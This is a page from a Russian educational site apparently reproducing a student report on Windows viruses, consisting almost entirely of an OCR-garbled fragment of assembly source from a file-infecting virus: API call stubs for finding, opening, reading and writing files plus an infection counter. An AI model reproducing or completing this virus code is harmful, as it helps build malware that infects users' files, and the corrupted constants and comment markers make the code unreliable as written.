Информатика, программирование / Доклад: Вирусы под Windows

Доклад: Вирусы под Windows

;3апишем в стек значение для получения
;времени и даты и вызовем KERNEL

push OBFF9D-l4Eh

jmp [ebp+offset kern]

;Вывод сообщения
MsgBox:

.Запишем в стек значение для вывода сообщения и вызовем KERNEL
push OBFF638D9h
jmp [ebp+offset kern]

.Поиск первого файла
FindFile:

;3апишем в стек значение для поиска первого файла
;и вызовем KERNEL

push OBFF77893h

jmp [ebp+offset kern]

; Поиск следующего файла
FindNext:

;3апишем в стек значение для поиска
[следующего файла и вызовем KERNEL

push OBFF778CBh

jmp [ebp+offset kern]

[Открытие/создание файла
CreateFile:

;3апишем в стек значение для открытия/создания файла
;и вызовем KERNEL

push OBFF77817h

jmp [ebp+offset kern]

[Установка указателя чтения/записи
SetFilePointer:

;3апишем в стек значение для установки
.указателя чтения/записи файла и вызовем KERNEL

push OBFF76FAOh

jmp [ebp+offset kern]

;Чтение из файла
ReadFile:

;3апишем в стек значение для чтения из файла и вызовем KERNEL
push OBFF75806h
jmp [ebp+offset kern]

;3апись в файл
WriteFile:

;3апишем в стек значение для записи в файл и вызовем KERNEL
push OBFF7580Dh
jmp [ebp+offset kern]

;3акрытие файла
CloseFile:

;3апишем в стек значение для закрытия файла и вызовем KERNEL
push OBFF7BC72h
jmp [ebp+offset kern]

;Счетчик заражений
countinfect db 0

Используется для поиска файлов
win32_data_thang:

К-во Просмотров: 966
Бесплатно скачать Доклад: Вирусы под Windows